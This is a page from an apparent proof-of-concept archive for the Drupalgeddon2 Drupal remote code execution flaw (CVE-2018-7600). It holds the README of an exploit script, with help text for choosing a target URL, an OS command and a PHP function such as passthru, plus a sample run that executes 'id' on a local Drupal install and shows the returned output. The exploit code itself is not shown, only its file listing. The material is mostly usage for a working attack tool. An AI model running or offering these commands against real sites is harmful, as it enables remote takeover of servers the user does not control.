Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2018-7600 PoC — Drupal 安全漏洞

Source
Associated Vulnerability
Title:Drupal 安全漏洞 (CVE-2018-7600)
Description:Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.
Readme
# Drupal - Drupalgeddon2 (CVE 2018-7600)


```
$ python3 drupalgeddon.py -h
[+] drupalgeddon2 (CVE-2018-7600) exploit by Rafael Caria
usage: drupalgeddon.py [-h] --url URL [--command COMMAND] [--function FUNCTION] [--test] [--proxy PROXY]

[!] This script exploits (CVE-2018-7600) a Drupal property injection in the Forms API. Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.

optional arguments:
  -h, --help                        show this help message and exit
  --url URL, -u URL                 URL of target Drupal site (ex: http://target.com/)
  --command COMMAND, -c COMMAND     OS Command to execute
  --function FUNCTION, -f FUNCTION  Function to use as attack vector (default = passthru)
  --test                            Test if target is vulnerable
  --proxy PROXY, -p PROXY           Configure a proxy in the format http://127.0.0.1:8080/ (default = none)
```

```
$ python3 drupalgeddon.py -u http://127.0.0.1 --test -c id
[+] drupalgeddon2 (CVE-2018-7600) exploit by Rafael Caria
[+] Sending request to: http://127.0.0.1
[+] Testing if: http://127.0.0.1 is vulnerable
[!] Target is vulnerable to CVE-2018-7600
[+] Triggering exploit to execute: id

uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
File Snapshot

[4.0K] /data/pocs/adad5aeb4d70d51095ef48f3b30e0bbf5837aae9 ├── [3.5K] drupalgeddon2.py └── [1.2K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →